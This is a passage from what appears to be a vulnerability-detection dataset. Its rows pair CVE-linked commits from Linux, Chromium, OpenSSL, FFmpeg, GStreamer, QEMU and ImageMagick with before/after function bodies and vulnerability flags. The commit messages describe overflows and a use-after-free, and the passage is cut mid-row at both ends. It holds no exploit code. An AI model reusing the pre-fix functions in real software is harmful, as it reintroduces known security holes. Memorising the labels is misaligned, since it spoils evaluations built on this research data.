tile_width=(i == (ssize_t) (number_tiles-1)) ? image->columns-(i*
tiff_info->tile_geometry.width) : tiff_info->tile_geometry.width;
for (j=0; j < (ssize_t) ((row % tiff_info->tile_geometry.height)+1); j++)
for (k=0; k < (ssize_t) tile_width; k++)
{
if (bytes_per_pixel == 0)
{
p=tiff_info->scanlines+(j*TIFFScanlineSize(tiff)+(i*
tiff_info->tile_geometry.width+k)/8);
q=tiff_info->pixels+(j*TIFFTileRowSize(tiff)+k/8);
*q++=(*p++);
continue;
}
p=tiff_info->scanlines+(j*TIFFScanlineSize(tiff)+(i*
tiff_info->tile_geometry.width+k)*bytes_per_pixel);
q=tiff_info->pixels+(j*TIFFTileRowSize(tiff)+k*bytes_per_pixel);
for (l=0; l < bytes_per_pixel; l++)
*q++=(*p++);
}
if ((i*tiff_info->tile_geometry.width) != image->columns)
status=TIFFWriteTile(tiff,tiff_info->pixels,(uint32) (i*
tiff_info->tile_geometry.width),(uint32) ((row/
tiff_info->tile_geometry.height)*tiff_info->tile_geometry.height),0,
sample);
if (status < 0)
break;
}
return(status);
}
| static int32 TIFFWritePixels(TIFF *tiff,TIFFInfo *tiff_info,ssize_t row,
tsample_t sample,Image *image)
{
int32
status;
register ssize_t
i;
register unsigned char
*p,
*q;
size_t
number_tiles,
tile_width;
ssize_t
bytes_per_pixel,
j,
k,
l;
if (TIFFIsTiled(tiff) == 0)
return(TIFFWriteScanline(tiff,tiff_info->scanline,(uint32) row,sample));
/*
Fill scanlines to tile height.
*/
i=(ssize_t) (row % tiff_info->tile_geometry.height)*TIFFScanlineSize(tiff);
(void) memcpy(tiff_info->scanlines+i,(char *) tiff_info->scanline,
(size_t) TIFFScanlineSize(tiff));
if (((size_t) (row % tiff_info->tile_geometry.height) !=
(tiff_info->tile_geometry.height-1)) &&
(row != (ssize_t) (image->rows-1)))
return(0);
/*
Write tile to TIFF image.
*/
status=0;
bytes_per_pixel=TIFFTileSize(tiff)/(ssize_t) (
tiff_info->tile_geometry.height*tiff_info->tile_geometry.width);
number_tiles=(image->columns+tiff_info->tile_geometry.width)/
tiff_info->tile_geometry.width;
for (i=0; i < (ssize_t) number_tiles; i++)
{
tile_width=(i == (ssize_t) (number_tiles-1)) ? image->columns-(i*
tiff_info->tile_geometry.width) : tiff_info->tile_geometry.width;
for (j=0; j < (ssize_t) ((row % tiff_info->tile_geometry.height)+1); j++)
for (k=0; k < (ssize_t) tile_width; k++)
{
if (bytes_per_pixel == 0)
{
p=tiff_info->scanlines+(j*TIFFScanlineSize(tiff)+(i*
tiff_info->tile_geometry.width+k)/8);
q=tiff_info->pixels+(j*TIFFTileRowSize(tiff)+k/8);
*q++=(*p++);
continue;
}
p=tiff_info->scanlines+(j*TIFFScanlineSize(tiff)+(i*
tiff_info->tile_geometry.width+k)*bytes_per_pixel);
q=tiff_info->pixels+(j*TIFFTileRowSize(tiff)+k*bytes_per_pixel);
for (l=0; l < bytes_per_pixel; l++)
*q++=(*p++);
}
if ((i*tiff_info->tile_geometry.width) != image->columns)
status=TIFFWriteTile(tiff,tiff_info->pixels,(uint32) (i*
tiff_info->tile_geometry.width),(uint32) ((row/
tiff_info->tile_geometry.height)*tiff_info->tile_geometry.height),0,
sample);
if (status < 0)
break;
}
return(status);
}
| C | ImageMagick | 0 |
CVE-2013-6381 | https://www.cvedetails.com/cve/CVE-2013-6381/ | CWE-119 | https://github.com/torvalds/linux/commit/6fb392b1a63ae36c31f62bc3fc8630b49d602b62 | 6fb392b1a63ae36c31f62bc3fc8630b49d602b62 | qeth: avoid buffer overflow in snmp ioctl
Check user-defined length in snmp ioctl request and allow request
only if it fits into a qeth command buffer.
Signed-off-by: Ursula Braun <ursula.braun@de.ibm.com>
Signed-off-by: Frank Blaschka <frank.blaschka@de.ibm.com>
Reviewed-by: Heiko Carstens <heicars2@linux.vnet.ibm.com>
Reported-by: Nico Golde <nico@ngolde.de>
Reported-by: Fabian Yamaguchi <fabs@goesec.de>
Cc: <stable@vger.kernel.org>
Signed-off-by: David S. Miller <davem@davemloft.net> | int qeth_qdio_clear_card(struct qeth_card *card, int use_halt)
{
int rc = 0;
QETH_CARD_TEXT(card, 3, "qdioclr");
switch (atomic_cmpxchg(&card->qdio.state, QETH_QDIO_ESTABLISHED,
QETH_QDIO_CLEANING)) {
case QETH_QDIO_ESTABLISHED:
if (card->info.type == QETH_CARD_TYPE_IQD)
rc = qdio_shutdown(CARD_DDEV(card),
QDIO_FLAG_CLEANUP_USING_HALT);
else
rc = qdio_shutdown(CARD_DDEV(card),
QDIO_FLAG_CLEANUP_USING_CLEAR);
if (rc)
QETH_CARD_TEXT_(card, 3, "1err%d", rc);
qdio_free(CARD_DDEV(card));
atomic_set(&card->qdio.state, QETH_QDIO_ALLOCATED);
break;
case QETH_QDIO_CLEANING:
return rc;
default:
break;
}
rc = qeth_clear_halt_card(card, use_halt);
if (rc)
QETH_CARD_TEXT_(card, 3, "2err%d", rc);
card->state = CARD_STATE_DOWN;
return rc;
}
| int qeth_qdio_clear_card(struct qeth_card *card, int use_halt)
{
int rc = 0;
QETH_CARD_TEXT(card, 3, "qdioclr");
switch (atomic_cmpxchg(&card->qdio.state, QETH_QDIO_ESTABLISHED,
QETH_QDIO_CLEANING)) {
case QETH_QDIO_ESTABLISHED:
if (card->info.type == QETH_CARD_TYPE_IQD)
rc = qdio_shutdown(CARD_DDEV(card),
QDIO_FLAG_CLEANUP_USING_HALT);
else
rc = qdio_shutdown(CARD_DDEV(card),
QDIO_FLAG_CLEANUP_USING_CLEAR);
if (rc)
QETH_CARD_TEXT_(card, 3, "1err%d", rc);
qdio_free(CARD_DDEV(card));
atomic_set(&card->qdio.state, QETH_QDIO_ALLOCATED);
break;
case QETH_QDIO_CLEANING:
return rc;
default:
break;
}
rc = qeth_clear_halt_card(card, use_halt);
if (rc)
QETH_CARD_TEXT_(card, 3, "2err%d", rc);
card->state = CARD_STATE_DOWN;
return rc;
}
| C | linux | 0 |
CVE-2009-1932 | https://www.cvedetails.com/cve/CVE-2009-1932/ | CWE-189 | https://cgit.freedesktop.org/gstreamer/gst-plugins-good/commit/?id=d9544bcc44adcef769cbdf7f6453e140058a3adc | d9544bcc44adcef769cbdf7f6453e140058a3adc | null | gst_pngdec_base_init (gpointer g_class)
{
GstElementClass *element_class = GST_ELEMENT_CLASS (g_class);
gst_element_class_add_pad_template (element_class,
gst_static_pad_template_get (&gst_pngdec_src_pad_template));
gst_element_class_add_pad_template (element_class,
gst_static_pad_template_get (&gst_pngdec_sink_pad_template));
gst_element_class_set_details (element_class, &gst_pngdec_details);
}
| gst_pngdec_base_init (gpointer g_class)
{
GstElementClass *element_class = GST_ELEMENT_CLASS (g_class);
gst_element_class_add_pad_template (element_class,
gst_static_pad_template_get (&gst_pngdec_src_pad_template));
gst_element_class_add_pad_template (element_class,
gst_static_pad_template_get (&gst_pngdec_sink_pad_template));
gst_element_class_set_details (element_class, &gst_pngdec_details);
}
| C | gstreamer | 0 |
CVE-2014-8275 | https://www.cvedetails.com/cve/CVE-2014-8275/ | CWE-310 | https://github.com/openssl/openssl/commit/684400ce192dac51df3d3e92b61830a6ef90be3e | 684400ce192dac51df3d3e92b61830a6ef90be3e | Fix various certificate fingerprint issues.
By using non-DER or invalid encodings outside the signed portion of a
certificate the fingerprint can be changed without breaking the signature.
Although no details of the signed portion of the certificate can be changed
this can cause problems with some applications: e.g. those using the
certificate fingerprint for blacklists.
1. Reject signatures with non zero unused bits.
If the BIT STRING containing the signature has non zero unused bits reject
the signature. All current signature algorithms require zero unused bits.
2. Check certificate algorithm consistency.
Check the AlgorithmIdentifier inside TBS matches the one in the
certificate signature. NB: this will result in signature failure
errors for some broken certificates.
3. Check DSA/ECDSA signatures use DER.
Reencode DSA/ECDSA signatures and compare with the original received
signature. Return an error if there is a mismatch.
This will reject various cases including garbage after signature
(thanks to Antti Karjalainen and Tuomo Untinen from the Codenomicon CROSS
program for discovering this case) and use of BER or invalid ASN.1 INTEGERs
(negative or with leading zeroes).
CVE-2014-8275
Reviewed-by: Emilia Käsper <emilia@openssl.org> | int i2d_RSAPublicKey_fp(FILE *fp, RSA *rsa)
{
return ASN1_item_i2d_fp(ASN1_ITEM_rptr(RSAPublicKey), fp, rsa);
}
| int i2d_RSAPublicKey_fp(FILE *fp, RSA *rsa)
{
return ASN1_item_i2d_fp(ASN1_ITEM_rptr(RSAPublicKey), fp, rsa);
}
| C | openssl | 0 |
CVE-2011-2839 | https://www.cvedetails.com/cve/CVE-2011-2839/ | CWE-20 | https://github.com/chromium/chromium/commit/c63f2b7fe4fe2977f858a8e36d5f48db17eff2e7 | c63f2b7fe4fe2977f858a8e36d5f48db17eff2e7 | Extend TTS extension API to support richer events returned from the engine
to the client. Previously we just had a completed event; this adds start,
word boundary, sentence boundary, and marker boundary. In addition,
interrupted and canceled, which were previously errors, now become events.
Mac and Windows implementations extended to support as many of these events
as possible.
BUG=67713
BUG=70198
BUG=75106
BUG=83404
TEST=Updates all TTS API tests to be event-based, and adds new tests.
Review URL: http://codereview.chromium.org/6792014
git-svn-id: svn://svn.chromium.org/chrome/trunk/src@91665 0039d316-1c4b-4281-b951-d872f2087c98 | static v8::Handle<v8::Value> GetNextRequestId(const v8::Arguments& args) {
static int next_request_id = 0;
return v8::Integer::New(next_request_id++);
}
| static v8::Handle<v8::Value> GetNextRequestId(const v8::Arguments& args) {
static int next_request_id = 0;
return v8::Integer::New(next_request_id++);
}
| C | Chrome | 0 |
CVE-2016-9446 | https://www.cvedetails.com/cve/CVE-2016-9446/ | CWE-200 | https://cgit.freedesktop.org/gstreamer/gst-plugins-bad/commit/gst/vmnc/vmncdec.c?id=4cb1bcf1422bbcd79c0f683edb7ee85e3f7a31fe | 4cb1bcf1422bbcd79c0f683edb7ee85e3f7a31fe | null | gst_vmnc_dec_class_init (GstVMncDecClass * klass)
{
GstElementClass *gstelement_class = GST_ELEMENT_CLASS (klass);
GstVideoDecoderClass *decoder_class = GST_VIDEO_DECODER_CLASS (klass);
decoder_class->start = gst_vmnc_dec_reset;
decoder_class->stop = gst_vmnc_dec_reset;
decoder_class->parse = gst_vmnc_dec_parse;
decoder_class->handle_frame = gst_vmnc_dec_handle_frame;
decoder_class->set_format = gst_vmnc_dec_set_format;
decoder_class->sink_event = gst_vmnc_dec_sink_event;
gst_element_class_add_static_pad_template (gstelement_class,
&vmnc_dec_src_factory);
gst_element_class_add_static_pad_template (gstelement_class,
&vmnc_dec_sink_factory);
gst_element_class_set_static_metadata (gstelement_class, "VMnc video decoder",
"Codec/Decoder/Video", "Decode VmWare video to raw (RGB) video",
"Michael Smith <msmith@xiph.org>");
GST_DEBUG_CATEGORY_INIT (vmnc_debug, "vmncdec", 0, "VMnc decoder");
}
| gst_vmnc_dec_class_init (GstVMncDecClass * klass)
{
GstElementClass *gstelement_class = GST_ELEMENT_CLASS (klass);
GstVideoDecoderClass *decoder_class = GST_VIDEO_DECODER_CLASS (klass);
decoder_class->start = gst_vmnc_dec_reset;
decoder_class->stop = gst_vmnc_dec_reset;
decoder_class->parse = gst_vmnc_dec_parse;
decoder_class->handle_frame = gst_vmnc_dec_handle_frame;
decoder_class->set_format = gst_vmnc_dec_set_format;
decoder_class->sink_event = gst_vmnc_dec_sink_event;
gst_element_class_add_static_pad_template (gstelement_class,
&vmnc_dec_src_factory);
gst_element_class_add_static_pad_template (gstelement_class,
&vmnc_dec_sink_factory);
gst_element_class_set_static_metadata (gstelement_class, "VMnc video decoder",
"Codec/Decoder/Video", "Decode VmWare video to raw (RGB) video",
"Michael Smith <msmith@xiph.org>");
GST_DEBUG_CATEGORY_INIT (vmnc_debug, "vmncdec", 0, "VMnc decoder");
}
| C | gstreamer | 0 |
CVE-2018-6094 | https://www.cvedetails.com/cve/CVE-2018-6094/ | CWE-119 | https://github.com/chromium/chromium/commit/0749ec24fae74ec32d0567eef0e5ec43c84dbcb9 | 0749ec24fae74ec32d0567eef0e5ec43c84dbcb9 | Call HeapObjectHeader::checkHeader solely for its side-effect.
This requires changing its signature. This is a preliminary stage to making it
private.
BUG=633030
Review-Url: https://codereview.chromium.org/2698673003
Cr-Commit-Position: refs/heads/master@{#460489} | void assertObjectHasGCInfo(const void* payload, size_t gcInfoIndex) {
HeapObjectHeader::fromPayload(payload)->checkHeader();
#if !defined(COMPONENT_BUILD)
ASSERT(HeapObjectHeader::fromPayload(payload)->gcInfoIndex() == gcInfoIndex);
#endif
}
| void assertObjectHasGCInfo(const void* payload, size_t gcInfoIndex) {
ASSERT(HeapObjectHeader::fromPayload(payload)->checkHeader());
#if !defined(COMPONENT_BUILD)
ASSERT(HeapObjectHeader::fromPayload(payload)->gcInfoIndex() == gcInfoIndex);
#endif
}
| C | Chrome | 1 |
CVE-2013-0886 | https://www.cvedetails.com/cve/CVE-2013-0886/ | null | https://github.com/chromium/chromium/commit/18d67244984a574ba2dd8779faabc0e3e34f4b76 | 18d67244984a574ba2dd8779faabc0e3e34f4b76 | Implement TextureImageTransportSurface using texture mailbox
This has a couple of advantages:
- allow tearing down and recreating the UI parent context without
losing the renderer contexts
- do not require a context to be able to generate textures when
creating the GLSurfaceHandle
- clearer ownership semantics that potentially allows for more
robust and easier lost context handling/thumbnailing/etc., since a texture is at
any given time owned by either: UI parent, mailbox, or
TextureImageTransportSurface
- simplify frontbuffer protection logic;
the frontbuffer textures are now owned by RWHV where they are refcounted
The TextureImageTransportSurface informs RenderWidgetHostView of the
mailbox names for the front- and backbuffer textures by
associating them with a surface_handle (1 or 2) in the AcceleratedSurfaceNew message.
During SwapBuffers() or PostSubBuffer() cycles, it then uses
produceTextureCHROMIUM() and consumeTextureCHROMIUM()
to transfer ownership between renderer and browser compositor.
RWHV sends back the surface_handle of the buffer being returned with the Swap ACK
(or 0 if no buffer is being returned in which case TextureImageTransportSurface will
allocate a new texture - note that this could be used to
simply keep textures for thumbnailing).
BUG=154815,139616
TBR=sky@chromium.org
Review URL: https://chromiumcodereview.appspot.com/11194042
git-svn-id: svn://svn.chromium.org/chrome/trunk/src@171569 0039d316-1c4b-4281-b951-d872f2087c98 | bool GpuProcessHost::LaunchGpuProcess(const std::string& channel_id) {
if (!(gpu_enabled_ &&
GpuDataManagerImpl::GetInstance()->ShouldUseSoftwareRendering()) &&
!hardware_gpu_enabled_) {
SendOutstandingReplies();
return false;
}
const CommandLine& browser_command_line = *CommandLine::ForCurrentProcess();
CommandLine::StringType gpu_launcher =
browser_command_line.GetSwitchValueNative(switches::kGpuLauncher);
#if defined(OS_LINUX)
int child_flags = gpu_launcher.empty() ? ChildProcessHost::CHILD_ALLOW_SELF :
ChildProcessHost::CHILD_NORMAL;
#else
int child_flags = ChildProcessHost::CHILD_NORMAL;
#endif
FilePath exe_path = ChildProcessHost::GetChildPath(child_flags);
if (exe_path.empty())
return false;
CommandLine* cmd_line = new CommandLine(exe_path);
cmd_line->AppendSwitchASCII(switches::kProcessType, switches::kGpuProcess);
cmd_line->AppendSwitchASCII(switches::kProcessChannelID, channel_id);
if (kind_ == GPU_PROCESS_KIND_UNSANDBOXED)
cmd_line->AppendSwitch(switches::kDisableGpuSandbox);
static const char* const kSwitchNames[] = {
switches::kDisableBreakpad,
switches::kDisableGLMultisampling,
switches::kDisableGpuSandbox,
switches::kReduceGpuSandbox,
switches::kDisableSeccompFilterSandbox,
switches::kEnableGpuSandbox,
switches::kDisableGpuVsync,
switches::kDisableGpuWatchdog,
switches::kDisableImageTransportSurface,
switches::kDisableAcceleratedVideoDecode,
switches::kDisableLogging,
switches::kEnableGPUServiceLogging,
switches::kEnableLogging,
#if defined(OS_MACOSX)
switches::kEnableSandboxLogging,
#endif
switches::kGpuNoContextLost,
switches::kGpuStartupDialog,
switches::kGpuSwitching,
switches::kLoggingLevel,
switches::kNoSandbox,
switches::kTestGLLib,
switches::kTraceStartup,
switches::kV,
switches::kVModule,
switches::kEnableUIReleaseFrontSurface,
#if defined(USE_AURA)
switches::kUIPrioritizeInGpuProcess,
#endif
switches::kCrashOnGpuHang,
switches::kEnableVirtualGLContexts,
};
cmd_line->CopySwitchesFrom(browser_command_line, kSwitchNames,
arraysize(kSwitchNames));
cmd_line->CopySwitchesFrom(
browser_command_line, switches::kGpuSwitches, switches::kNumGpuSwitches);
GetContentClient()->browser()->AppendExtraCommandLineSwitches(
cmd_line, process_->GetData().id);
GpuDataManagerImpl::GetInstance()->AppendGpuCommandLine(cmd_line);
if (cmd_line->HasSwitch(switches::kUseGL))
software_rendering_ =
(cmd_line->GetSwitchValueASCII(switches::kUseGL) == "swiftshader");
UMA_HISTOGRAM_BOOLEAN("GPU.GPUProcessSoftwareRendering", software_rendering_);
#if defined(OS_WIN)
cmd_line->AppendSwitchASCII("ignored", " --type=renderer ");
#endif
if (!gpu_launcher.empty())
cmd_line->PrependWrapper(gpu_launcher);
process_->Launch(
#if defined(OS_WIN)
FilePath(),
#elif defined(OS_POSIX)
false, // Never use the zygote (GPU plugin can't be sandboxed).
base::EnvironmentVector(),
#endif
cmd_line);
process_launched_ = true;
UMA_HISTOGRAM_ENUMERATION("GPU.GPUProcessLifetimeEvents",
LAUNCHED, GPU_PROCESS_LIFETIME_EVENT_MAX);
return true;
}
| bool GpuProcessHost::LaunchGpuProcess(const std::string& channel_id) {
if (!(gpu_enabled_ &&
GpuDataManagerImpl::GetInstance()->ShouldUseSoftwareRendering()) &&
!hardware_gpu_enabled_) {
SendOutstandingReplies();
return false;
}
const CommandLine& browser_command_line = *CommandLine::ForCurrentProcess();
CommandLine::StringType gpu_launcher =
browser_command_line.GetSwitchValueNative(switches::kGpuLauncher);
#if defined(OS_LINUX)
int child_flags = gpu_launcher.empty() ? ChildProcessHost::CHILD_ALLOW_SELF :
ChildProcessHost::CHILD_NORMAL;
#else
int child_flags = ChildProcessHost::CHILD_NORMAL;
#endif
FilePath exe_path = ChildProcessHost::GetChildPath(child_flags);
if (exe_path.empty())
return false;
CommandLine* cmd_line = new CommandLine(exe_path);
cmd_line->AppendSwitchASCII(switches::kProcessType, switches::kGpuProcess);
cmd_line->AppendSwitchASCII(switches::kProcessChannelID, channel_id);
if (kind_ == GPU_PROCESS_KIND_UNSANDBOXED)
cmd_line->AppendSwitch(switches::kDisableGpuSandbox);
static const char* const kSwitchNames[] = {
switches::kDisableBreakpad,
switches::kDisableGLMultisampling,
switches::kDisableGpuSandbox,
switches::kReduceGpuSandbox,
switches::kDisableSeccompFilterSandbox,
switches::kEnableGpuSandbox,
switches::kDisableGpuVsync,
switches::kDisableGpuWatchdog,
switches::kDisableImageTransportSurface,
switches::kDisableAcceleratedVideoDecode,
switches::kDisableLogging,
switches::kEnableGPUServiceLogging,
switches::kEnableLogging,
#if defined(OS_MACOSX)
switches::kEnableSandboxLogging,
#endif
switches::kGpuNoContextLost,
switches::kGpuStartupDialog,
switches::kGpuSwitching,
switches::kLoggingLevel,
switches::kNoSandbox,
switches::kTestGLLib,
switches::kTraceStartup,
switches::kV,
switches::kVModule,
switches::kEnableUIReleaseFrontSurface,
#if defined(USE_AURA)
switches::kUIPrioritizeInGpuProcess,
#endif
switches::kCrashOnGpuHang,
switches::kEnableVirtualGLContexts,
};
cmd_line->CopySwitchesFrom(browser_command_line, kSwitchNames,
arraysize(kSwitchNames));
cmd_line->CopySwitchesFrom(
browser_command_line, switches::kGpuSwitches, switches::kNumGpuSwitches);
GetContentClient()->browser()->AppendExtraCommandLineSwitches(
cmd_line, process_->GetData().id);
GpuDataManagerImpl::GetInstance()->AppendGpuCommandLine(cmd_line);
if (cmd_line->HasSwitch(switches::kUseGL))
software_rendering_ =
(cmd_line->GetSwitchValueASCII(switches::kUseGL) == "swiftshader");
UMA_HISTOGRAM_BOOLEAN("GPU.GPUProcessSoftwareRendering", software_rendering_);
#if defined(OS_WIN)
cmd_line->AppendSwitchASCII("ignored", " --type=renderer ");
#endif
if (!gpu_launcher.empty())
cmd_line->PrependWrapper(gpu_launcher);
process_->Launch(
#if defined(OS_WIN)
FilePath(),
#elif defined(OS_POSIX)
false, // Never use the zygote (GPU plugin can't be sandboxed).
base::EnvironmentVector(),
#endif
cmd_line);
process_launched_ = true;
UMA_HISTOGRAM_ENUMERATION("GPU.GPUProcessLifetimeEvents",
LAUNCHED, GPU_PROCESS_LIFETIME_EVENT_MAX);
return true;
}
| C | Chrome | 0 |
CVE-2017-11719 | https://www.cvedetails.com/cve/CVE-2017-11719/ | CWE-125 | https://github.com/FFmpeg/FFmpeg/commit/296debd213bd6dce7647cedd34eb64e5b94cdc92 | 296debd213bd6dce7647cedd34eb64e5b94cdc92 | avcodec/dnxhddec: Move mb height check out of non hr branch
Fixes: out of array access
Fixes: poc.dnxhd
Found-by: Bingchang, Liu@VARAS of IIE
Signed-off-by: Michael Niedermayer <michael@niedermayer.cc> | static int dnxhd_decode_dct_block_10_444(const DNXHDContext *ctx,
RowContext *row, int n)
{
return dnxhd_decode_dct_block(ctx, row, n, 6, 32, 6, 0);
}
| static int dnxhd_decode_dct_block_10_444(const DNXHDContext *ctx,
RowContext *row, int n)
{
return dnxhd_decode_dct_block(ctx, row, n, 6, 32, 6, 0);
}
| C | FFmpeg | 0 |
CVE-2016-7910 | https://www.cvedetails.com/cve/CVE-2016-7910/ | CWE-416 | https://github.com/torvalds/linux/commit/77da160530dd1dc94f6ae15a981f24e5f0021e84 | 77da160530dd1dc94f6ae15a981f24e5f0021e84 | block: fix use-after-free in seq file
I got a KASAN report of use-after-free:
==================================================================
BUG: KASAN: use-after-free in klist_iter_exit+0x61/0x70 at addr ffff8800b6581508
Read of size 8 by task trinity-c1/315
=============================================================================
BUG kmalloc-32 (Not tainted): kasan: bad access detected
-----------------------------------------------------------------------------
Disabling lock debugging due to kernel taint
INFO: Allocated in disk_seqf_start+0x66/0x110 age=144 cpu=1 pid=315
___slab_alloc+0x4f1/0x520
__slab_alloc.isra.58+0x56/0x80
kmem_cache_alloc_trace+0x260/0x2a0
disk_seqf_start+0x66/0x110
traverse+0x176/0x860
seq_read+0x7e3/0x11a0
proc_reg_read+0xbc/0x180
do_loop_readv_writev+0x134/0x210
do_readv_writev+0x565/0x660
vfs_readv+0x67/0xa0
do_preadv+0x126/0x170
SyS_preadv+0xc/0x10
do_syscall_64+0x1a1/0x460
return_from_SYSCALL_64+0x0/0x6a
INFO: Freed in disk_seqf_stop+0x42/0x50 age=160 cpu=1 pid=315
__slab_free+0x17a/0x2c0
kfree+0x20a/0x220
disk_seqf_stop+0x42/0x50
traverse+0x3b5/0x860
seq_read+0x7e3/0x11a0
proc_reg_read+0xbc/0x180
do_loop_readv_writev+0x134/0x210
do_readv_writev+0x565/0x660
vfs_readv+0x67/0xa0
do_preadv+0x126/0x170
SyS_preadv+0xc/0x10
do_syscall_64+0x1a1/0x460
return_from_SYSCALL_64+0x0/0x6a
CPU: 1 PID: 315 Comm: trinity-c1 Tainted: G B 4.7.0+ #62
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
ffffea0002d96000 ffff880119b9f918 ffffffff81d6ce81 ffff88011a804480
ffff8800b6581500 ffff880119b9f948 ffffffff8146c7bd ffff88011a804480
ffffea0002d96000 ffff8800b6581500 fffffffffffffff4 ffff880119b9f970
Call Trace:
[<ffffffff81d6ce81>] dump_stack+0x65/0x84
[<ffffffff8146c7bd>] print_trailer+0x10d/0x1a0
[<ffffffff814704ff>] object_err+0x2f/0x40
[<ffffffff814754d1>] kasan_report_error+0x221/0x520
[<ffffffff8147590e>] __asan_report_load8_noabort+0x3e/0x40
[<ffffffff83888161>] klist_iter_exit+0x61/0x70
[<ffffffff82404389>] class_dev_iter_exit+0x9/0x10
[<ffffffff81d2e8ea>] disk_seqf_stop+0x3a/0x50
[<ffffffff8151f812>] seq_read+0x4b2/0x11a0
[<ffffffff815f8fdc>] proc_reg_read+0xbc/0x180
[<ffffffff814b24e4>] do_loop_readv_writev+0x134/0x210
[<ffffffff814b4c45>] do_readv_writev+0x565/0x660
[<ffffffff814b8a17>] vfs_readv+0x67/0xa0
[<ffffffff814b8de6>] do_preadv+0x126/0x170
[<ffffffff814b92ec>] SyS_preadv+0xc/0x10
This problem can occur in the following situation:
open()
- pread()
- .seq_start()
- iter = kmalloc() // succeeds
- seqf->private = iter
- .seq_stop()
- kfree(seqf->private)
- pread()
- .seq_start()
- iter = kmalloc() // fails
- .seq_stop()
- class_dev_iter_exit(seqf->private) // boom! old pointer
As the comment in disk_seqf_stop() says, stop is called even if start
failed, so we need to reinitialise the private pointer to NULL when seq
iteration stops.
An alternative would be to set the private pointer to NULL when the
kmalloc() in disk_seqf_start() fails.
Cc: stable@vger.kernel.org
Signed-off-by: Vegard Nossum <vegard.nossum@oracle.com>
Acked-by: Tejun Heo <tj@kernel.org>
Signed-off-by: Jens Axboe <axboe@fb.com> | void disk_unblock_events(struct gendisk *disk)
{
if (disk->ev)
__disk_unblock_events(disk, false);
}
| void disk_unblock_events(struct gendisk *disk)
{
if (disk->ev)
__disk_unblock_events(disk, false);
}
| C | linux | 0 |
CVE-2018-20815 | https://www.cvedetails.com/cve/CVE-2018-20815/ | CWE-119 | https://git.qemu.org/?p=qemu.git;a=commitdiff;h=da885fe1ee8b4589047484bd7fa05a4905b52b17 | da885fe1ee8b4589047484bd7fa05a4905b52b17 | null | void qemu_fdt_dumpdtb(void *fdt, int size)
{
const char *dumpdtb = qemu_opt_get(qemu_get_machine_opts(), "dumpdtb");
if (dumpdtb) {
/* Dump the dtb to a file and quit */
exit(g_file_set_contents(dumpdtb, fdt, size, NULL) ? 0 : 1);
}
}
| void qemu_fdt_dumpdtb(void *fdt, int size)
{
const char *dumpdtb = qemu_opt_get(qemu_get_machine_opts(), "dumpdtb");
if (dumpdtb) {
/* Dump the dtb to a file and quit */
exit(g_file_set_contents(dumpdtb, fdt, size, NULL) ? 0 : 1);
}
}
| C | qemu | 0 |
CVE-2017-5101 | https://www.cvedetails.com/cve/CVE-2017-5101/ | CWE-20 | https://github.com/chromium/chromium/commit/29734f46c6dc9362783091180c2ee279ad53637f | 29734f46c6dc9362783091180c2ee279ad53637f | media: remove base::SharedMemoryHandle usage in v4l2 encoder
This replaces a use of the legacy UnalignedSharedMemory ctor
taking a SharedMemoryHandle with the current ctor taking a
PlatformSharedMemoryRegion.
Bug: 849207
Change-Id: Iea24ebdcd941cf2fa97e19cf2aeac1a18f9773d9
Reviewed-on: https://chromium-review.googlesource.com/c/chromium/src/+/1697602
Commit-Queue: Matthew Cary (CET) <mattcary@chromium.org>
Reviewed-by: Ricky Liang <jcliang@chromium.org>
Cr-Commit-Position: refs/heads/master@{#681740} | bool V4L2JpegEncodeAccelerator::EncodedInstanceDmaBuf::SetInputBufferFormat(
gfx::Size coded_size,
const VideoFrameLayout& input_layout) {
DCHECK(parent_->encoder_task_runner_->BelongsToCurrentThread());
DCHECK(!input_streamon_);
DCHECK(input_job_queue_.empty());
constexpr uint32_t input_pix_fmt_candidates[] = {V4L2_PIX_FMT_NV12M,
V4L2_PIX_FMT_NV12};
struct v4l2_format format;
input_buffer_pixelformat_ = 0;
for (const auto input_pix_fmt : input_pix_fmt_candidates) {
DCHECK_EQ(V4L2Device::V4L2PixFmtToVideoPixelFormat(input_pix_fmt),
PIXEL_FORMAT_NV12);
memset(&format, 0, sizeof(format));
format.type = V4L2_BUF_TYPE_VIDEO_OUTPUT_MPLANE;
format.fmt.pix_mp.num_planes = kMaxNV12Plane;
format.fmt.pix_mp.pixelformat = input_pix_fmt;
format.fmt.pix_mp.field = V4L2_FIELD_ANY;
format.fmt.pix_mp.width = coded_size.width();
format.fmt.pix_mp.height = coded_size.height();
auto num_planes = input_layout.num_planes();
for (size_t i = 0; i < num_planes; i++) {
format.fmt.pix_mp.plane_fmt[i].sizeimage = input_layout.planes()[i].size;
format.fmt.pix_mp.plane_fmt[i].bytesperline =
input_layout.planes()[i].stride;
}
if (device_->Ioctl(VIDIOC_S_FMT, &format) == 0 &&
format.fmt.pix_mp.pixelformat == input_pix_fmt) {
device_input_layout_ = V4L2Device::V4L2FormatToVideoFrameLayout(format);
input_buffer_pixelformat_ = format.fmt.pix_mp.pixelformat;
input_buffer_num_planes_ = format.fmt.pix_mp.num_planes;
input_buffer_height_ = format.fmt.pix_mp.height;
break;
}
}
if (input_buffer_pixelformat_ == 0) {
VLOGF(1) << "Neither NV12 nor NV12M is supported.";
return false;
}
if (format.fmt.pix_mp.width != static_cast<uint32_t>(coded_size.width()) ||
format.fmt.pix_mp.height != static_cast<uint32_t>(coded_size.height())) {
VLOGF(1) << "Width " << coded_size.width() << "->"
<< format.fmt.pix_mp.width << ",Height " << coded_size.height()
<< "->" << format.fmt.pix_mp.height;
return false;
}
return true;
}
| bool V4L2JpegEncodeAccelerator::EncodedInstanceDmaBuf::SetInputBufferFormat(
gfx::Size coded_size,
const VideoFrameLayout& input_layout) {
DCHECK(parent_->encoder_task_runner_->BelongsToCurrentThread());
DCHECK(!input_streamon_);
DCHECK(input_job_queue_.empty());
constexpr uint32_t input_pix_fmt_candidates[] = {V4L2_PIX_FMT_NV12M,
V4L2_PIX_FMT_NV12};
struct v4l2_format format;
input_buffer_pixelformat_ = 0;
for (const auto input_pix_fmt : input_pix_fmt_candidates) {
DCHECK_EQ(V4L2Device::V4L2PixFmtToVideoPixelFormat(input_pix_fmt),
PIXEL_FORMAT_NV12);
memset(&format, 0, sizeof(format));
format.type = V4L2_BUF_TYPE_VIDEO_OUTPUT_MPLANE;
format.fmt.pix_mp.num_planes = kMaxNV12Plane;
format.fmt.pix_mp.pixelformat = input_pix_fmt;
format.fmt.pix_mp.field = V4L2_FIELD_ANY;
format.fmt.pix_mp.width = coded_size.width();
format.fmt.pix_mp.height = coded_size.height();
